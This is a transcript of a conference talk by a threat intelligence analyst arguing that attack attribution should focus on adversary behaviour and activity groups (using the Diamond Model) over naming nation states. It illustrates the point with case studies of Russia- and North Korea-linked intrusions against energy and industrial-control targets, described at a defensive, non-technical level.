Threat Activity Attribution: Differentiating the Who from the How

great

plenty of seats in the middle up here folks if you're standing in the back and looking for it's something southwest airlines though you're last in you're you're sitting somewhere in the center so all right i think we're good good to start all right hey everyone how's it going uh my name is joe sloick today we're going to talk about a subject near and dear to my heart as a threat intelligence analyst we're going to talk about threat activity attribution and how the way that most people are doing it is in my opinion wrong so contentious subject off the bat really this is more ecumenical i just have a different way or my company is a

different way of looking at things than others but we're gonna go into some of the differences that surround that and why there are other ways of thinking about this process than what we're used to so who am i i am joe sloick i'm a threat intelligence analyst and adversary hunter a much cooler title working for dragos which is down the road in hanover prior to that i ran the incident response team at los alamos national labs in fact i still live in los alamos and dragos is very happy to let me work full-time remote so most of the time this time of day i'm in boxer shorts and just kind of sitting in my office doing my own thing before that i

was an information warfare officer in the navy and way before that i didn't have a cs background i actually dropped out of graduate school in philosophy from the university of chicago so that navy philosophy background means that i can curse very eloquently but i'm going to try to not do that here so what are we going to talk about today today we're going to talk about typical attribution because you can't rail against something unless you define what that thing is so at least i'll present to you what i find to be typical attribution when it comes to threat intelligence work we'll talk about what the purpose of attribution should be from the defender's perspective go into a concept called activity groups

which will fuel a alternative definition for uh attribution techniques talk about behavior focused attribution then go into a couple of really cool examples that tie into some high profile activity that's gone on in the industrial control space because that's what i do my company is an industrial control system security company but i think they'll resonate because you'll recognize some of these things from recent headlines so traditional attribution is very similar to this terrible report that was put out by another company several years ago so typically focuses on who who done it uh look for some sort of identifying details within the data and tie these back to some concrete entity that we can point at and blame

in the case of this there was a lot of really bad data involved and while it's probably no doubt that the iranians were doing some uh shenanigans at this point in time what was put out in that report in the drive to push a narrative that you know hey the iranians are doing all this malicious cyber activity and they're going to turn off the lights and such resulted in some truly terrible conclusions but enough bashing other people really what we're looking for is you know what's the benefits of this traditional way of looking at attribution you know quite frankly it satisfies a very primal human need you know who done it who do i blame

who's at fault i want to point a finger at someone and call them out and make them stop it frames matters in a way that's cognitively not easy but you know it makes sense to us we like to look at things in narratives or stories like i want to tell a story that this action happened and it was uh you know the person who did it was this guy and it resulted in these sorts of things well identifying who owns that action or who performed it is very fundamental to how we want to think about things problem is you know doing this sort of attribution is really hard you know typically our only collection especially

unless you're in some spooky three-letter agency down the road from here you know all you really got to work with are technical artifacts that you might have gathered in you know an incident response scenario harvested from public or commercial data sets you don't really have access to things like the emails the adversaries were sending back and forth within their own network that would be very strange so as a result you really have to infer intentionality from what you can observe and those technical artifacts do a really poor job outside of broad brush strokes you know this is ransomware this is an information stealer you know it's hard to get a feel for you know who's really behind this and why

are they doing it uh most importantly i think this doesn't get mentioned as often as it should is that a preoccupation with trying to come up with attribution based upon an identifiable entity really plays into the possibility of cognitive biases so if you assume that like oh the russians are doing it i run uh i'm having a problem thinking of an example off the top of my head now some organization that is immaterial in the grand scheme of things the russians are not coming after me that may be true may not be quite frankly and i think this was a point that was made very well at the keynote today and something i'd like to

emphasize personally you don't get to choose who's your adversary they choose you so really identifying more along the lines of what actions are going to take place and how to respond to them is where you should be going furthermore and this is the industry i think needs to wear a hair shirt on this is that a lot of companies are really hot to trot for saying like yes we know north korea is responsible for this but the problem is is that based upon that same data collection issue i mentioned earlier yeah we can maybe get just far enough based upon some malware similarities some ip addresses maybe language sets although none of this is really definitive in and of

itself to say that yeah it was probably country x we take the media bump but then we can't really go any further than that and it's disingenuous to think that you know all entities operating under the umbrella of the democratic people's republic of korea or the russian federation or the people's republic of china or the united states are really the same team there's different groups that are operating in these broader ages so they have different motivations different techniques and different ways of operating so as a result we don't really get a meaningful look at what sort of distinction we're trying to make in this sort of ham-fisted attribution that doesn't seem terribly beneficial so here's some media examples so metro

links hearted by the north koreans russia behind not petya the cyber attack targets safety system at saudi aramco was especially fun for me since that related to the crisis instant incident that my company did a lot of research on but you know all of these are really trying to go for generating a certain amount of headlines and i don't want to call out the this too negatively or whatever because if you look at the general populace and you know what kind of publications are we talking about here washington post foreign policy ars technica uh the star i forget where i pulled that from my apologies but these are all mass media publications these aren't technical

journals these aren't white papers these aren't malware analysis reports so you know there's a limitation to how deep we can dive here but in presenting these things as being a black or white country a or country b we're covering up a lot of nuance that's important to note in how these sorts of activities take place so what do we gain knowing that country x is responsible for event y and i say this from the perspective of network defenders so from a network defense perspective you'll likely get nothing or for that same cognitive bias issue i talked about it might be damaging like oh the chinese just want to steal information the russians are you know really shifty and they can

burrow in networks for years and we'll never catch them and the north koreans are destructive like all of these are assumptions that can potentially damage how you approach an incident if you're bringing into it a preconception of how that incident will play out now having said that again this is purely from the network defender perspective if you're a policy maker maybe even a c-level institute member it might make sense to know who was responsible i would like to think that the president of the united states has some conception of who's to blame for an incident therefore informing certain policy choices but none of us in this room although these days who knows or whatever could

be is going to be president anytime soon um but you know really what we're looking to do is try and figure out a way to defend the networks that we're in responsible for and secure those networks from an adversary so determining who is responsible it's nice but it doesn't have any real specific value for defense but identifying how an attack took place allows us to inform defense and try and build a more effective means of responding to data based upon the threat profile that you develop for your organization so what attribution should do is that as a result of getting an idea for what sort of entity is responsible how they operate is that you can align

resources to meet that adversary identify tactics techniques and procedures and then focus your defense in a way that allows you to maximize what limited resources you have available to the threat landscape that you actually face and ultimately if it doesn't somehow assist you inform your defense make it easier for you to use the resources that you have what's the point it's a book report then i read something that's entertaining but it doesn't help me do my job and so those sorts of things might be fun in our spare time but i don't know about the rest of you i only have so many hours and i spend way too many of them as it is

working in information security i want to make sure i'm getting the most value out of those so what attribution should do is follow a general process and i'm assuming we're in the greater baltimore area how many people have a dod background in here hey people are being honest okay you know this will look a lot like the intelligence cycle so really you know what attribution should try and do is that an attack take takes place either against your organization or against a third party try and collect and aggregate data record the context around which it happened then from there start turning that raw data into information uh formulate conclusions based upon what actually happened within the environment

what actions took place the uh progress of events from a to b to c and then develop a conception of the adversary not based on who you think they are but rather how did they behave how does the adversary act what are their targets what are their intentions from a technical perspective their infrastructure what did they try and get to now the results of this is that one you get intelligence that's my field uh track how the adversary operates learn to try and anticipate activity based upon not specific instantiations of behavior but rather generalizations of how that adversary behaves which leads into the next step and this was mentioned in an earlier talk on incident response

you know having that idea then lets you begin to develop playbooks for how you're going to respond when i know that this particular adversary has compromised my network i have a reasonably high confidence that their follow-on actions their follow-on toolkits look like these sorts of entities and allows me to prioritize my response to that adversary and finally from a remediation perspective gives you an idea for what sort of things you need to go in and clean up what sort of persistence mechanisms may have been in place what little toys and fun things might have been left behind after you clear away the most obvious pieces of the intrusion so ultimately we really want attribution to

prepare and enable defenders if it doesn't do that i'm not interested this allows us to improve defenses and potentially anticipate attacks as long as we have good data collection on how these adversaries are operating anything else is superfluous you get flashy media headlines provocative stories could even cause some level of danger by you know pointing fingers irresponsibly at other organizations and saying like nope these guys are responsible when no those guys weren't responsible whatsoever uh false flags come up a lot and uh the olympic destroyer example with the pyeongchang opening ceremonies was a case study in that where it's like oh south korea got attacked must be north korea wait a minute might look like the

russians like wait a minute maybe they want us to think that it looks like they're you go down a rabbit hole really fast instead of just approaching that scenario as like oh here's a warmable infection vector that's using credential seating and replay to spread throughout a network for destructive purposes full stop respond to that doesn't matter who the hell is responsible for it you've got an idea for how to approach that problem now now the way that we do this at dragos and that i approach this personally revolves around a concept called activity groups it's a methodology for defining actors not based on who they are but how they operate so the who in many cases is fundamentally

irrelevant it could be anyone but here's how they act and here's what they're up to so the focus really is on observables if it's not something that you see not something that you can test not something that you can play with it's a theory it's an intuition or it's a really bad assumption so you need to avoid speculation and inference get away from again potential cognitive biases and look for a definitive picture for how an attack took place based upon concrete data retrieved from either the incident or from outside sources and enrichment so in looking at this i like to call out an example you know going back to what i said earlier you know the u.s computer

network operations activity is not a monolithic entity neither is russian federation computer network operations instead you know you have a command authority you know vladimir putin's up here after that like okay you'll have some development teams these are the guys who put together your malware do some other stuff or whatever your specialists are creating tools and then off of that you've got a bunch of different operations teams you've got the gru the svr the fsb or whoever that actually go out and execute not only that but the svr itself or just like the us military is not a single monolithic organization either they have team a team b team c all those teams have different

goals different targets different mission sets and they probably have operational tells so breaking this down on an activity group basis moves us away from a lot of what you see with attribution that really focuses on development teams you know what does the malware look like well the malware might be shared by a bunch of different people that are doing different things and get us one further level down to where the rubber meets the road and we see these actors from a defensive standpoint who's actually trying to break into my network yeah so traditionally you know we're focusing on readily observed items c2ip addresses and geolocation off of that because that's really useful malware samples which you know it's

important your tools tell a lot about who you are but tools can be reused repurposed um stolen and used by other entities completely separate from their originators so as a result really going back to that previous slide development teams get a lot of attention but the actual operations components of computer network operations don't get the attention they deserve when that's really fundamentally what we as defenders need to worry about and i keep saying defenders if there's right teamers in the room it's okay you don't have to acknowledge yourself we'll make fun of you later so breaking out operations is that you know different operations teams can use a similar tool set for different operations and one of the examples we'll

talk about in a little bit really goes right to this point but a behavioral approach to identifying these entities makes sure that we can actually break these out and track them from a perspective that matters to how we're going to organize and implement our defense the goal is to identify operations teams by their behaviors and to the best that we can determine their objectives that could be by industry vertical could be by you know distinction between data steeler versus malicious attack disruptive attack etc now informing how we define an activity group is something that i am obligated to present as being an important document because the man who authored it as my boss is the diamond model of intrusion

analysis so this is something pulled forward by sergio caltegroni my boss and two other guys who i'm sure are important uh andrew pendergrass and christopher betts that uh no it's a really good paper i highly recommend everyone read it but maybe not right before bedtime but you know it really does approach this idea of how to go out and uh you know this paper specifically focuses on how to use this for intrusion analysis but it can be extended in order to define uh threat intelligence activity and the sort of attribution we're talking about right now so it's called the diamond model i wonder what it looks like looks like that so really it's a concept

where you have you know edit center here's your activity group what defines what an activity group looks like well each of these vertices give an adversary yeah an adversary the who it's just one part of the whole and not only that it's not even the most important part but then the adversary implements infrastructure the means by which they connect to a victim and a capability how they will then impact that victim environment which lastly goes back to the victim or target what is this infrastructure used to deliver what capability in what environment and you take all of this as a whole and that gives you a conception of like oh what does this look like

who are these people how do they operate what are their fundamental goals from an operational perspective so analysis in this case primarily focuses on the technical observations that are available to us but using them in a way to abstract from the particulars to come up with a general conception of behavior so the main things we'll focus on are infrastructure and capabilities like i said earlier the adversary can be abstracted you can give them name funny names my little ponies pokemon something i'm wearing my pokemon shirt today by the way my daughter loves this shirt so if you can't make it out check it out later um and then the victim might be useful for parsing out campaigns

or trying to figure out what applies to your threat model but you know it's really focusing on that middle uh of the diamond and looking at those technical indicators to figure out what is it that you're looking at so infrastructure like i said before is simply the means through which a capability is executed provides a link from the adversary to the victim the means through which a capability will be deployed and in looking at this you can categorize infrastructure through both atomic and behavioral or um brain fart um complex uh identifiers so atomic elements of infrastructure are your traditional iocs you have an ip address a domain name maybe a few other sorts of things it's

very relevant to an identified event and critical from an incident response perspective but from a moving forward perspective it's absolutely useless i p addresses change domain addresses are a dime a dozen especially now with all the stupid tlds we have so it's not necessarily helpful to characterize future activity based upon a single atomic infrastructure ioc but if you abstract from this one layer higher deeper take your perspective you can start picking up trends and patterns and well what kind of infrastructure are they using this is less likely to change because everyone has tendencies laziness a way of operating especially when you start talking about large bureaucratic organized environments it's like well this is how the sop is written this is how i'm going

to register dirty domains so you get an idea for how is it that this adversary is going to go about continuing to at least form the baseline of their operations so examples could be things like ssl certificate creation and infrastructure types and themes so examples of this that i like to call out a lot in my own reporting you know what kind of infrastructure do they use do they register their own devices do they buy their own virtual private servers or does your adversary go out and compromise some poor university and use a bunch of servers sitting over there as their hot points and their exfiltration points before getting back to their own network somewhere hosting and

registration patterns are a good one i was kind of upset to see that they put this out there i believe it was threat connect had a pretty interesting article about uh apt 28 fancy bear domain and registration activity that has been the same for five years uh maybe it won't be now since it's very public at this point um but yeah these guys just kept doing the same thing because it worked and no one was really catching on to it all that much and then another one that's interesting is ssl certificate reuse so you know are you reusing the same ssl certs maybe you're generating new certs but maybe your ssl cert metadata looks very

similar across each cert apt-28 provides another good example there with some of the cert metadata on a lot of their items for the course of about a year and a half we can go in that as a sidebar we don't have all that much time so anyway we've talked about infrastructure what about capabilities works kind of the same way it's what an adversary utilizes to achieve an objective against victim you know how do i get effects on target sorry i used to be in the military it's primarily behavioral nature when properly implemented but it can include indications of intent as a result going back to what does this software do does it overwrite the mbr and shut the

computer down that's a wiper does it you know search for all xls and doc files that's a data exfiltration tool so it gives you an idea of intention there but you know we don't want to read too much into that necessarily and again there's an atomic aspect to this this is your traditional like hey i have a hash value i have a registry key maybe some other sorts of things that you can poke out but just like the infrastructure items they're easily changed hash values are trivially easily changed and even things like greg keys mutex values etc like it's a means to an end it's not necessarily something that's going to persist beyond a single action maybe a

single campaign unless someone's a really bad adversary but trying to understand the capability by understanding the underlying behaviors it's trying to achieve is really important this goes to how the adversary operates what actions are they typically performing what methodologies are they implementing you know the general it's almost like the difference between pseudocode and your ultimate compiled code the pseudocode likely or at least your source code is probably not going to change all that much you can make some changes around the margin but that's work no one wants to do work i'll make a couple of edits recompile it and boom i just defeated antivirus i use pe spin i defeated antivirus but the fundamentals behind it are going

to remain rather the same so the goal is to build a picture of the adversary's operations what they're trying to achieve and how they're trying to operate rather than going towards the individual identifier for a specific event so examples of this would be intrusion techniques are you someone who is using custom malware or as we talked about this morning at the keynote living off the land what sort of coding and deployment consistencies are in place do they always use the same language are they reusing the same functions and not changing up compilers often enough that you could actually pick out specific functions in byte code that was the case with apt3 with a very specific

timestamping function for almost 10 years they did not change that piece of code did not change how they were compiling their malware awesome little signature and what tendencies do they have for persistence yeah they create a run key but how do they go about doing it or what sort of things are they dropping on target to make sure that they can stay in that environment after they get identified or to be able to come back and revisit it later on so putting it all together i want to characterize an adversary activity identify those commonalities and general trends in order to build that diamond picture um you know but basing this off of the observed behavior that we find as a

result of intrusion events either stuff that we witness ourselves or by doing some you know hard work and digging into what data is available to us from external sources and then design our detections and alerts around that you don't want to detect against what someone might do that you kind of want to do you know it's good to try and stay ahead of the game but you know invest your resources in the things that you know that the adversaries that you face are likely to use against you this goes into an entire different conversation uh threat profiling and identifying threat models which is another hour on top of this and no one wants to sit here for two hours

and they won't let me so we won't get into that this time around but happy to talk about that anytime if anyone's interested not likely but uh so looking at this in practice you know really you want to leverage all that available evidence that you have at your disposal to build this if you're not using all the data or looking for more at every iteration you're doing it wrong there's always more that we can find uh to both capture how things change over time as well as to improve the fidelity of the of the picture that we have of what activity we're observing and when it comes to differentiation uh it's a simple rule any two unique vertices on the

diamond model means new activity group so unique capabilities unique uh target or victim okay that's a new activity group unique capabilities and infrastructure new activity group it allows us to try and sort out matters and break things apart based upon how we'll actually respond and react to them as we observe them let's talk about some examples to illustrate this i'm doing really good on time probably also talking really damn fast so the first example we'll talk about is one that i like rage about a lot in a number of ways because it just kind of bugs me so alanite and daimloy to drago's specific terms in dragonfly these are all russian associated we don't do nation

state attribution at my company but others are saying this so we'll just say it maybe it's russian so multiple reporting on russian infiltration of u.s energy and ics related companies in the summer of 2017. this eventually multiple threads of reporting technical reporting and media reporting combined what we feel uh and can prove based upon the technique that i've just spent the last half an hour railing at you about uh really represent multiple different activities probably related but different enough that it's important to differentiate them from a response and monitoring perspective the resulting picture that we're provided as a result of the you know the who focused attribution is something that's less than ideal from a defender's perspective

so going back uh washington post published a nice little article that u.s officials say russian government hackers have penetrated energy and nuclear company business networks i forget if it was wapo if it was the new york times but someone pointed out a very specific nuclear power plant in kansas as being a victim which was not nice but anyway so it's like okay we had this going on the government name for this campaign was palmetto fusion that's how we referred to this activity initially for quite some time uh the reason we know that is because the dhs report on that which was tlp it wasn't read i think it was amber but it quickly went tlp new york times and

this got got its way into the media anyway um after that we had semantic came out with you know in many ways a really good report on something that they called dragonfly now for those of you with some experience in the ics security space dragonfly should ring a bell dragonfly was an actor that was really active in industrial control related intrusions from about 2012 to 2014 or 15. uh they had a really cool piece of malware called havox that was able to pull devices using the opc protocol do some other gnarly things well symantec presented some activity that looked a little bit like the palmetto fusion stuff but was different in some other ways and rolled it all into this dragonfly

2.0 dragonfly is back there it is and then fast forward a few more weeks and then us cert kind of stepped in to save the day is there anyone from dhs here okay all right heart goes out to you guys man you guys are doing a good job but not necessarily always with the like everything that you need in order to do it so ta17239 alpha came out uh october time frame that took all of this activity and combined it into this is what's going on got rised earlier this year a couple weeks ago pretty much the same as the last report except this one said all this stuff still holds and it was the russians now we

maybe we gained something there but i would venture that like not really hasn't none of the underlying fundamentals here are any different people still shouldn't be poking around in power networks i don't care who the hell they are so going to an activity recap what does this look like so in july we had the alanite activity october we had the report on dymaloy semantics continuation of dragonfly followed quickly by us cert and then moving into the revised u.s cert meeting that very critical who's done it um criteria but there's a lot of distinctions here so among other things just from a simple time perspective you know the original dragonfly was you know early 2010s somewhat early 2010s 2013 2014 that time

frame then you had this daimler-like activity from late 2015 to early 2017 and then the alanite or palmetto fusion activity doesn't really appear until the end of may of 2017 and a lot of it looks like it's kind of continuing the time differences in question also align with substantial changes in tactics techniques and procedures so for daimloy uh these guys they're probably guys uh their initial access phishing strategic website compromise this will look familiar in a subsequent slide but i'll explain how that's different they deploy some implants dimeloy liked using reusing commodity malware for all of their uh operations so they used a couple remote access tools or trojans i mean if it's not pretending to be something else is it

really a trojan anyway it's a rat uh carigani b herplore a couple other things kind of associated with a lot of crimeware stuff there's nothing really unique about it but not using a custom platform and then doing something similar for backdoors using uh door shell and good ore for uh a backdoor to maintain access to compromised devices once they're in places that they wanted to go to they deployed a couple of different techniques so they were doing credential capture uh through a customized program that incorporated the mimikat source code and then added a couple of other things on there to do things like harvest ssh keys harvest certificates etc and from a data collection standpoint

they had some scripts set up in order to harvest documents and gather other intelligence info of interest like okay that's that's how this looks we just talked about capability right here what's it look like well there's a phishing message which is ironic if you know what iso 27k is it's an information security standard underneath the covers is this monstrosity right here so this goes back to a technique of prompting an external s b connection using the file colon whack nomenclature pointing to an adversary controlled ip and in the case of daimler they put this base64 encoded looking thing here for a png okay that's kind of interesting what this will do is that that outbound smb connection

along with the attempt to like hey i want to talk smb because your network is not poorly secured and you're letting me talk out on 445 is you'll get a windows authentication attempt that ships with that which could be broken in order to harvest credentials to get into the network that's the whole idea for that initial access it wasn't trying to deliver a fish in the traditional sense of like i'm going to drop a malicious document that's going to exploit you it's just trying to get this to come out there in order to harvest credentials and rdp right back into your network alanite is similar but different all generalizations are stupid so you'll look that from an initial access

standpoint phishing and strategic website compromise huh that looks familiar we'll get back to that but then moving on from that there's next stage operations all system scripts publicly available tools powershell scripts and things of that nature there's no real malware whatsoever with the exception of some use of mimikatz like tools all this was for credential capture and reuse throughout the network uh plus from a backdoor perspective like you know they were this entity relies on being able to capture and replay credentials to move around to ensure that they were continuously capturing credentials in the target environment they used a really gnarly technique of creating a link file lnk file with a icon image that used the same

reference to an external object with the file command so you load up start menu or whatever and boom there's the icon it tries to call back call back out over four four five so you get another replay of the credential harvesting attempt that's kind of cool but anyway like completely relying on being able to pivot through legitimate system means throughout the network from an information collection perspective uh just seeing lots of publicly available password cracking uh examples mimikats uh some mimikatz variants uh i forget the network capture tool but just things you can download off of github no customization whatsoever and using rdp to move around and transfer files their phishing's a little different especially because the activity itself

going to the targeting victim aspect was laser-like focused on energy utilities so what they were doing was sending out fake resumes some really good fake resumes with the exception that they sent cvs to targets in the us and resumes to targets in the uk now if you know the difference that is not how that usually works but other than that they were doing a really good job like hey this guy actually looks like he knows his crap and would probably make a good controls engineer higher under the covers you see something similar except where it's hosted within the you know we're talking compound document formats here is you had it within the settings xml branch and instead of

seeing the base64 flagged or fingerprinted ideas you're just getting this normal.m so looking at a template file so again there's a lot of similarities here i'm buying that but the way that we're talking about implementation also looks a little bit different so i'm not going to stand up here and say that these groups are completely unrelated and these might be the north koreans but we're seeing a different instantiation of the activity in question but then moving away from some of these operational uh bits there's some really significant targeting differences so dymaloy got its start in turkey specifically with an energy company based in ankara before moving on to a lot of european targets and then some

us entities got hit in the bargain broad-based ics targeting advanced manufacturing oil and gas electric utilities etc alanite however only focused on the us and the uk maybe ireland that's an open question because one of the phishing messages was just a plain text article or copy paste article about a energy substation construction project that was having pollution impacts on a tiny river in ireland it's very specific i don't know why they would care about ireland but you know so be it but the main thing is that all of these were focused on the energy sector so looking at this within the components of the diamond model we're seeing significant differences in terms of both the capabilities that were

executed yeah the same smb thing is being leveraged but being leveraged in different ways so it could be an evolution of an existing adversary or it could be someone you know saw the i believe cisco taylor's published the first public article that i know about this technique like oh that looks pretty cool we'll do the same thing and then on top of that you have well how were they impacting host environments how are they getting in and staying in you got one group that's using a lot of off-the-shelf malware the other group that's doing complete script use and living off the land techniques and finally in terms of what they're going after you've got one that's solely focused on

us uk electric utility environments the other being much more broad-based ics related targeting so at that point like you know this looks significantly different enough to me that at the very least we have a couple different operations teams here so again my opinion they look substantially different from each other maybe i haven't convinced you we can find it out later in the parking lot uh you know the main thing is they may be related one may be an evolution of one another but based on the available evidence they're not the same and making them look the same or saying that they're the same really makes it a little difficult for us to defend against it because the implications are

we've got different targeting and different techniques which mean different responses like yeah it's important to really you know bone up on your ability to detect and defend against living off the land technique since everyone's doing it now it's the new hotness but you know from a perspective of who's doing it to me to my industry to other organizations like me again we don't have infinite security budgets gotta focus on the things that are most relevant to you in the here and now and try and take care of other things as they come along so if i'm prioritizing and i'm an electric utility i'm much more worried about alanite than i am about dimeloi necessarily and that shift in targeting uh indicates

potentially a change in priorities for these groups combining with two is one really just makes planning a little muddy and inhibits the ideal way of allocating scarce resources in the security environment so dragonfly dimly and alanite may all be the same adversary but different teams might all be russia it's very possible i'm not going to say that's wrong but they look different from each other such that you know at the very least different ttps and targeting over time make these look like different operations teams that might be all answering to the same task master at the end of the day and based on that we can come up with different ways of designing playbooks response procedures and methods of

tracking these entities that both have different levels of relevance for different organizations and different plans and procedures in order to go after respond and remediate after an intrusion now something a little different covelight another internal dragos term and lazarus so kovaleit was a group that we initially discovered through some kind of scary and very focused fishing in september of 2017 that was very targeted in some very specific u.s electric companies uh in a time when u.s north korean relations weren't all fuzzy and warm like they are right now we'll get back to the north korean thing well we don't have to i said lazarus group so a review of how that phishing worked what payload was dropped and

how the document was put together indicated a really strong overlap with the lazarus group who's the lazarus group one more slide sorry so here was publicity so nbc news north korea targeted u.s electric power companies oh that's kind of scary that got reported in early october the activity itself was middle of september lazarus group so what do these guys look like so the lazarus group is increasingly a catch-all for north korean linked activity dhs us government publicly refers to this as hidden cobra a couple of other terms that are out there as well but hidden cobra is kind of the all-encompassing adversary term uh i don't like the whole like the lazarus group because it doesn't look like

there's a lazarus group anymore it looks like there's this catch-all for all things that look like they're north korean and there's a bunch of different operations that happen to reuse a lot of the same techniques because if you look at lazarus you've got operations that range from hey i'm going to steal all your bitcoins to hey i'm going to steal your data to hey i'm going to wipe your network and say that i'm part of i can't remember the sony hack goofy organization that they flagged but the important thing is that something like lazarus has been active since 2012 and possibly even earlier than that doing all sorts of dirty things all over the world

now the link between kovaleite and lazarus is there's multiple technical overlaps the malicious document dropper was a big giveaway because it was a very specific uh decoding algorithm that was applied to embedded data within the document file to drop a binary on target and then on the malware that was dropped itself there was overlapping overlaps in terms of the code and functionality as well as obfuscation techniques any analysis techniques that were deployed additionally there was a little bit of infrastructure overlap but i think this is where this group messed up so typically lazarus in general and kovalei specifically they use compromised legitimate infrastructure a university in mexico a non-profit in western europe something along those lines

and typically you see specific infrastructure per campaign these guys messed up though because for the cobalite uh variant while kovaleigh differentiated itself from the majority of other lazarus observables and that it did a if else call out to three different addresses upon infection one of those addresses overlapped with a separate lazarus campaign that was centered around bitcoin theft like you guys messed up you forgot that one my opinion um so yeah reuse across campaigns kind of shoot some of that upset right in the foot now koblade itself you know fishing with malicious document attachment not a very good document on its face we'll see an example in a second but under the covers it's pretty

complex the embedded executable is built via a macro and then the exact executable beacons via a fake tls connection to the compromise c2 conser servers before reaching back to truly adversary owned infrastructure so the document itself is sent as a fundraiser invitation theme you know it looks like garbage like okay what's that mean and then when you enable macros you get this garbage i don't know about you but if i did that i would be calling my secure i would be my security team but you should call your security team if you saw that but beneath that uh what's going on well here's what the macro looks like so you've got a couple of different decoding routines

that do a bunch of shifting back and forth and picking from a bunch of arrays of strings and it's really decoding and building a binary from all that mess right there and we're not doing a malware analysis talk and not only that jimmy's here yell at me he's my colleague he's an rv wizard so he would yell at me because i'm getting something wrong so we'll get to that later but kovaleite and lazarus there's an overlapping capability so that same phishing document you can track back going almost a year and a half different campaigns associated with different fragments of overall lazarus activity stealing bitcoin from polish banks phishing a techno uh ibm actually so it's publicly available whatever

in the philippines going after a theater high altitude missile defense um contractor in south korea including this fishing campaign targeting u.s electric companies um some of the aspects are unique to covaleite so the multiple beacon ip thing that's only seen in the kovaleit sample as far as i can tell i've seen another lazarus example that does the try this guy try that guy then try this guy then wait and try this guy that guy and that guy all the other lazarus ones like try this ip try it again and there's differences in terms of sleep times and some other things you know but otherwise there's a lot of technical similarities between these things which makes it pretty solid that

either someone is deliberately going out making this look really close to lazarus to a degree that would require almost source code access or this is part of the same overarching group but there's a problem here lazarus simply encompasses too much stuff we've abused this term to the point where it's no longer all that meaningful to us that makes tracking identifying and defending difficult because how many of us have bitcoin wallets that we host in our organizations i hope i don't see any hands okay uh yeah all right we got one all right it's gonna be a fun party tonight but you know some of us might have defense sensitive data or other things which tap into

some of these techniques but not all of them so really what we want to do is try and break these operations that are all being accumulated under a single catch-all group to try and find some differentiation so we can focus attention and resources so the defender problem is to make sure that we have coverage for those things that are actionable and relevant to us you know he who defends everything defends nothing so saith frederick the great uh even though he was kind of a jerk but um he said something smart on top of invading saxony but the main thing is that we don't want to waste resources on unlikely items because we try and hold back all the things we're going to

let something through so instead of trying to defend against everything focus on the things that are most relevant to us most likely to hit your environment and then you know again assume breach sorry have a good ir plan for the things that you're not anticipating uh the lazarus approach by trying to defend against lazarus is way too broad there's too many things going on too many variants of the malware there's been a couple of shifts in ttps over the cast past couple of months actually because these guys are still active um that really prioritization is a critical thing in order to make sure that you you know keep touch with how this group is operating and evolving

so try and narrow your focus based on the activity in question cobalite is very specific in targeting if you're an electric utility you need to worry about cove light if you're a bitcoin wallet holder you probably don't need to worry about cove light maybe some covelight like behaviors but it's a different entirety when looked at as an activity than a lot of the other lazarus activity so the overlap in ttps can be distinguished by the uniqueness and targeting and some of the uniqueness applied to the otherwise generalized set of malware so filter the ttps filter out those things that relate only to the non-ics related things if you're an electric utility and avoid all the other lazarus stuff because

you're just gonna be generating noise so going back to our diamond model and we have some infrastructure uniqueness uh there is the one oopsy where they reused an ip uh but the victim target stuff really stands out capability is roughly the same although there's some uh differences there as well but these are our main differentiators against something that might be overall looked at as lazarus writ all so where are we right now well we're about 15 minutes before i'm supposed to get off stage but where are we in the presentation start summing things up ultimately what we want to do is we want to make defense manageable we want to break activities up into component parts that we can deal

with again not defend against everything defend against the things that are relevant to your environment your organization use your resources smartly against what is going to be you know what fits your risk profile track what matters and then focus your defense on that environment so again i mentioned earlier one of the key components to this and applying this usefully in your environments is really coming up with a good understanding of what does my environment look like who am i what do i do what are my sources of business value what are my sources of visibility what are my sort what are my areas of invisibility what are my strengths and weaknesses building that into a picture of what

your capabilities are what you're presenting of value to a malicious actor and then figuring out like okay now what do i do you know i don't necessarily have to worry about you know these things over here but maybe if i'm a clear defense contractor i really need to worry about foreign governments breaking in stealing plans to the f-35 there might be some that haven't been stolen yet i don't know but if there are those are still out there um so really you know shaping what it is that prevent that presents itself as a threat to you and how that's going to act so that you know how to orient your environment start taking strategic decisions again

the keynote this morning was very excellent on this front because you know this goes into the aspect where as defenders ultimately we kind of own our environment maybe not as much as we like because there's a i t and i.t security divide but we can take actions to shape manage and otherwise contort that rit environment to fit our defensive needs setting up strategic network choke points for monitoring or blocking purposes establishing baselines in terms of system uh health system application and whatnot in order to meet the challenges that we face with particular adversaries trying to devise ways that for the threats that we face that we can you know lay as many i thought it was

really excellent bear traps and alligators and dinosaurs and other stuff to make it just a royal pain for the adversary to break in that's something that we can control and having an idea for what it is that we need to protect and how we need to go about doing that enables this sort of activity so ultimately you know going to the lazarus example and something we talked about very early is differentiating between actors campaigns and ttps so when looking at entities don't just think that you have monolithic groups that correspond to some magical nation state in the sky that are coming after you no you have different bureaucratic organizations different units of whatever is people liberation cyber army

national force or whatever that are all competing against each other to hit their metrics for the month that all have slightly different targeting profiles and different ways of operating don't fall into the trap of thinking that everyone's going to operate alike but rather break this out into how each individual group that you can observe operates within the scope of what you need to respond to as a defender from the profile of your organization also note that you know campaigns shift over time as well you know one of the things that i think is confusing with the daimloy alanite and going all the way back to dragonfly example is there is a lot of similarity here you

can look at these as being campaigns that have been executed by probably the same command authority over time against very similar targets but they've shifted over time so is that because you've had a evolution in tactics over time farming this out to different operational groups because the first one was out of rotation or didn't do a good enough job but understanding that these things aren't going to be static and shaping to the ttps that are observed within the environment it's critical to you know keep up with this problem you know there's the myth of that myth the legend of the red queen that you know she keeps running and we keep getting halfway there well that's insufficient

because we're never going to catch her so you need to figure out a way to beat the damn red queen beat her over the head with something and overtake her in this case by trying to come up with an idea of anticipating behavior within the network environment how attack's gonna look so you can shape your defense to match what your adversary is most likely to do so let's try and draw this to a close attribution's really good when it's properly focused and it's pretty damn useless when it's not uh identifying activities oops there we go there we go identifying activities provides an actionable information to defenders you want to look for things that are going to assist you know if

your management gonna help your people do their job if you're one of those people something that's gonna assist me in making my network safer or facilitating my ability to respond and remediate in my environment doing that means you focus on observables you know when you assume you make an ass out of you and me don't just try and read things in because of who you think is responsible base your conceptions of what this activity looks like off of the evidence that you have at hand and what you're able to collect through other sources you know it doesn't just mean that everything that hits me forms my data set no you have to go out and do

research go pull public reports go to public data sets try and build a broader profile not just what was used against you to really get a grasp for how the activity works and maybe there's different groups that all align to a similar set of capabilities but are applying them in different ways such as we saw with the broad scope of lazarus activity so really what we're trying to go after because we all like things that are you know graphically focused and go a to b to c it's a process is that we want to have an activity that we can narrow down define note observable items determine their operational purpose and then align those observations

